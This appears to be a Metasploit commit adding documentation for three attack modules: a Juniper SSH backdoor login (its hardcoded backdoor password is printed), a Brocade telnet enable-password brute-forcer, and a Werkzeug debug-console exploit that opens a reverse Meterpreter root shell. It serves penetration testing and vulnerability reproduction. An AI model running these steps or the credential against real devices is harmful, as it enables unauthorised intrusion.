Browse Source

Land #7165, Add documentation for juniper_backdoor, brocade_enable_login, and werkzeug_debug_rce

William Webb 3 years ago
parent
commit
a48487578c
No account linked to committer's email address

+ 33
- 0
documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md View File

@@ -0,0 +1,33 @@
1
+## Vulnerable Application
2
+
3
+  Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.
4
+  
5
+  A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): [here](https://github.com/h00die/MSF-Testing-Scripts/tree/master/juniper_firmware)
6
+
7
+  For verification puposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts)
8
+
9
+## Verification Steps
10
+
11
+  1. Install the application
12
+  2. Start msfconsole
13
+  3. Do: ` use auxiliary/scanner/ssh/juniper_backdoor`
14
+  4. Do: `set rhosts`
15
+  5. Do: `run`
16
+  6. You should see: `[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u`
17
+
18
+## Scenarios
19
+
20
+  Example run against a Juniper SSG5 with vuln firmware from above link.
21
+
22
+```
23
+msf > use auxiliary/scanner/ssh/juniper_backdoor
24
+msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
25
+rhosts => 192.168.1.1
26
+msf auxiliary(juniper_backdoor) > set verbose true
27
+verbose => true
28
+msf auxiliary(juniper_backdoor) > run
29
+
30
+[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
31
+[*] Scanned 1 of 1 hosts (100% complete)
32
+[*] Auxiliary module execution completed
33
+```

+ 242
- 0
documentation/modules/auxiliary/scanner/telnet/brocade_enable_login.md View File

@@ -0,0 +1,242 @@
1
+## Vulnerable Application
2
+
3
+  This module is a login bruteforcer against Brocade network device's `enable` feature.
4
+  
5
+To configure the device in a vulnerable fashion, follow these steps:
6
+  1. Set authentication mode via: `aaa authentication enable default local`
7
+
8
+This module works against `enable` so we want to ensure telnet itself has no auth
9
+  **The following should not be set**: `enable telnet authentication`
10
+  
11
+This module has been verified against:
12
+  1. ICX6450-24 SWver 07.4.00bT311
13
+  2. FastIron WS 624 SWver 07.2.02fT7e1
14
+
15
+An emulator is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_emulator.py)
16
+
17
+## Verification Steps
18
+
19
+  1. Install the emulator or device
20
+  2. Start msfconsole
21
+  3. Do: `use auxiliary/scanner/telnet/brocade_enable_login`
22
+  4. Create/set a password file: `set pass_file /<passwords.lst>`
23
+  5. If desired: `set user_as_pass true`
24
+  6. Do: `set rhosts <ip>`
25
+  7. Do: `run`
26
+  8. You should get a shell.
27
+
28
+## Scenarios
29
+
30
+  Example run against ICX6450-24 SWver 07.4.00bT311
31
+
32
+```
33
+msf > use auxiliary/scanner/telnet/brocade_enable_login 
34
+msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
35
+pass_file => /passwords.lst
36
+msf auxiliary(brocade_enable_login) > set user_as_pass true
37
+user_as_pass => true
38
+msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1
39
+rhosts => 192.168.50.1
40
+msf auxiliary(brocade_enable_login) > run
41
+
42
+[*]  Attempting username gathering from config on 192.168.50.1
43
+[*]    Found: admin@192.168.50.1
44
+[*]    Found: read@192.168.50.1
45
+[*]    Found: port@192.168.50.1
46
+[*]  Attempting username gathering from running-config on 192.168.50.1
47
+[*]    Found: admin@192.168.50.1
48
+[*]    Found: read@192.168.50.1
49
+[*]    Found: port@192.168.50.1
50
+[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin
51
+[*] Attempting to start session 192.168.50.1:23 with admin:admin
52
+[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500
53
+[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: )
54
+[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read
55
+[*] Attempting to start session 192.168.50.1:23 with read:read
56
+[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500
57
+[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: )
58
+[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port
59
+[*] Attempting to start session 192.168.50.1:23 with port:port
60
+[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500
61
+[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: )
62
+[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: )
63
+[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: )
64
+[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: )
65
+[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: )
66
+[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: )
67
+[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
68
+[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
69
+[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: )
70
+[*] Scanned 1 of 1 hosts (100% complete)
71
+[*] Auxiliary module execution completed
72
+msf auxiliary(brocade_enable_login) > sessions -l
73
+
74
+Active sessions
75
+===============
76
+
77
+  Id  Type    Information                           Connection
78
+  --  ----    -----------                           ----------
79
+  1   shell   TELNET admin:admin (192.168.50.1:23)  192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1)
80
+  2   shell   TELNET read:read (192.168.50.1:23)    192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1)
81
+  3   shell   TELNET port:port (192.168.50.1:23)    192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1)
82
+
83
+msf auxiliary(brocade_enable_login) > session -i 1
84
+[-] Unknown command: session.
85
+msf auxiliary(brocade_enable_login) > sessions -i 1
86
+[*] Starting interaction with 1...
87
+
88
+show sessions ?
89
+Unrecognized command
90
+BR-telnet@FWS624 Router#show ?
91
+  802-1w                 Rapid Spanning tree IEEE 802.1w D10 status
92
+  aaa                    Show TACACS+ and RADIUS server statistics
93
+  access-list            show IPv4 access-list information
94
+  acl-on-arp             Show ARP ACL filtering
95
+  arp                    Arp table
96
+  auth-mac-addresses     MAC Authentication status
97
+  batch                  Batch commands
98
+  boot-preference        System boot preference
99
+  buffer-profile         Displays active profile
100
+  cable-diagnostics      Show Cable Diagnostics
101
+  chassis                Power supply/fan/temperature
102
+  clock                  System time and date
103
+  configuration          Configuration data in startup config file
104
+  cpu-utilization        CPU utilization rate
105
+  debug                  Debug information
106
+  default                System default settings
107
+  dot1x                  Dot1x information
108
+  errdisable             Errdisable status
109
+  fdp                    CDP/FDP information
110
+  flash                  Flash memory contents
111
+  gvrp                   GVRP information
112
+  inline                 inline power information
113
+  interfaces             Port status
114
+--More--, next page: Space, next line: Return key, quit: Control-c 
115
+  ip                     IP address setting
116
+  ipv6                   IP setting
117
+  license                Show license information
118
+  link-aggregate         802.3ad Link Aggregation Information
119
+  link-error-disable     Link Debouncing Control
120
+  link-keepalive         Link Layer Keepalive
121
+  lldp                   Link-Layer Discovery Protocol information
122
+  local-userdb           Local User Database information
123
+  logging                System log
124
+  loop-detection         loop detection status & disabled ports
125
+  mac-address            MAC address table
126
+  media                  1Gig/10G port media type
127
+  memory                 System memory usage
128
+  metro-ring             Metro ring protocol information
129
+  mirror                 Mirror ports
130
+  module                 Module type and status
131
+  monitor                Monitor ports
132
+  mstp                   show MSTP (IEEE 802.1s) information
133
+  optic                  Optic Temperature and Power
134
+  port                   Show port security
135
+  priority-mapping       802.1Q tagged priority setting
136
+  processes              Active process statistics
137
+  protected-link-group   Show Protected Link Group Details
138
+--More--, next page: Space, next line: Return key, quit: Control-c 
139
+  ptrace                 Global ptrace information
140
+  qd-buffer-profile      User configured buffer/descriptor profiles
141
+  qos-profiles           QOS configuration
142
+  qos-tos                IPv4 ToS based QoS
143
+  radius                 show radius server debug info
144
+  rate-limit             Rate-limiting table and actions
145
+  redundancy             Display management redundancy details
146
+  relative-utilization   Relative utilization list
147
+  reload                 Scheduled system reset
148
+  reserved-vlan-map      Reserved VLAN map status
149
+  rmon                   Rmon status
150
+  running-config         Current running-config
151
+  scheduler-profile      User configured scheduling profiles
152
+  sflow                  sFlow information
153
+  snmp                   SNMP statistics
154
+  sntp                   Show SNTP
155
+  span                   Spanning tree status
156
+  statistics             Packet statistics
157
+  stp-bpdu-guard         BPDU Guard status
158
+  stp-group              Spanning Tree Group Membership
159
+  stp-protect-ports      Show stp-protect enabled ports and their BPDU drop
160
+                         counters
161
+  table-mac-vlan         MAC Based VLAN status
162
+--More--, next page: Space, next line: Return key, quit: Control-c 
163
+  tech-support           System snap shot for tech support
164
+  telnet                 Telnet connection
165
+  topology-group         Topology Group Membership
166
+  traffic-policy         Show traffic policy definition
167
+  trunk                  Show trunk status
168
+  users                  User accounts
169
+  v6-l4-acl-sessions     Show IPv6 software sessions
170
+  version                System status
171
+  vlan                   VLAN status
172
+  vlan-group             VLAN Group Membership
173
+  voice-vlan             Show voice vlan
174
+  vsrp                   Show VSRP commands
175
+  web-connection         Current web connections
176
+  webauth                web authentication information
177
+  who                    User login
178
+  |                      Output modifiers
179
+  <cr>
180
+BR-telnet@FWS624 Router#
181
+```
182
+
183
+  Example run against emulator mentioned above:
184
+
185
+```
186
+msf > use auxiliary/scanner/telnet/brocade_enable_login 
187
+msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1
188
+rhosts => 127.0.0.1
189
+msf auxiliary(brocade_enable_login) > set user_as_pass true
190
+user_as_pass => true
191
+msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
192
+pass_file => /passwords.lst
193
+msf auxiliary(brocade_enable_login) > run
194
+
195
+[*]  Attempting username gathering from config on 127.0.0.1
196
+[*]    Found: username@127.0.0.1
197
+[*]    Found: ttrogdon@127.0.0.1
198
+[*]    Found: dmudd@127.0.0.1
199
+[*]  Attempting username gathering from running-config on 127.0.0.1
200
+[*]    Found: TopDogUser@127.0.0.1
201
+[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: )
202
+[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: )
203
+[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: )
204
+[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password
205
+[*] Attempting to start session 127.0.0.1:23 with username:password
206
+[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500
207
+[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: )
208
+[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon
209
+[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon
210
+[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500
211
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: )
212
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: )
213
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: )
214
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: )
215
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: )
216
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: )
217
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: )
218
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: )
219
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: )
220
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: )
221
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: )
222
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: )
223
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: )
224
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: )
225
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: )
226
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: )
227
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: )
228
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: )
229
+[*] Scanned 1 of 1 hosts (100% complete)
230
+[*] Auxiliary module execution completed
231
+msf auxiliary(brocade_enable_login) > sessions -l
232
+
233
+Active sessions
234
+===============
235
+
236
+  Id  Type    Information                              Connection
237
+  --  ----    -----------                              ----------
238
+  1   shell   TELNET username:password (127.0.0.1:23)  127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1)
239
+  2   shell   TELNET ttrogdon:ttrogdon (127.0.0.1:23)  127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1)
240
+
241
+msf auxiliary(brocade_enable_login) >
242
+```

+ 72
- 0
documentation/modules/exploit/multi/http/werkzeug_debug_rce.md View File

@@ -0,0 +1,72 @@
1
+## Vulnerable Application
2
+
3
+Verified against:
4
+  + 0.9.6 on Debian
5
+  + 0.9.6 on Centos
6
+  + 0.10 on Debian
7
+  
8
+A sample application which enables the console debugger is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/werkzeug_console.py)
9
+
10
+## Verification Steps
11
+
12
+  1. Install the application
13
+  2. Start msfconsole
14
+  3. Do: `use exploit/multi/http/werkzeug_debug_rce`
15
+  4. Do: `set rport <port>`
16
+  5. Do: `set rhost <ip>`
17
+  6. Do: `check`
18
+```
19
+[+] 10.108.106.201:8081 - The target is vulnerable.
20
+```
21
+  7. Do: `set payload python/meterpreter/reverse_tcp`
22
+  8. Do: `set lhost <ip>`
23
+  9. Do: `exploit`
24
+  10. You should get a shell.
25
+
26
+## Options
27
+
28
+  **TARGETURI**
29
+
30
+  TARGETURI by default is `/console`, as defined by werkzeug, however it can be changed within the python script.
31
+
32
+## Scenarios
33
+
34
+Example utilizing the previously mentioned sample app listed above.
35
+
36
+```
37
+msf > use exploit/multi/http/werkzeug_debug_rce
38
+msf exploit(werkzeug_debug_rce) > set rport 8081
39
+rport => 8081
40
+msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201
41
+rhost => 10.108.106.201
42
+msf exploit(werkzeug_debug_rce) > check
43
+[+] 10.108.106.201:8081 - The target is vulnerable.
44
+msf exploit(werkzeug_debug_rce) > set payload python/meterpreter/reverse_tcp
45
+payload => python/meterpreter/reverse_tcp
46
+msf exploit(werkzeug_debug_rce) > set lhost 10.108.106.121
47
+lhost => 10.108.106.121
48
+msf exploit(werkzeug_debug_rce) > exploit
49
+
50
+[*] Started reverse handler on 10.108.106.121:4444
51
+[*] Sending stage (25277 bytes) to 10.108.106.201
52
+[*] Meterpreter session 2 opened (10.108.106.121:4444 -> 10.108.106.201:36720) at 2015-07-09 19:02:52 -0400
53
+
54
+meterpreter > getpid
55
+Current pid: 13034
56
+meterpreter > getuid
57
+Server username: root
58
+meterpreter > sysinfo
59
+Computer     : werkzeug
60
+OS           : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24)
61
+Architecture : x86_64
62
+Meterpreter  : python/python
63
+meterpreter > shell
64
+Process 13037 created.
65
+Channel 0 created.
66
+/bin/sh: 0: can't access tty; job control turned off
67
+# ls
68
+app.py  app.pyc  werkzeug
69
+# exit
70
+meterpreter > exit
71
+[*] Shutting down Meterpreter...
72
+```

Loading…
Cancel
Save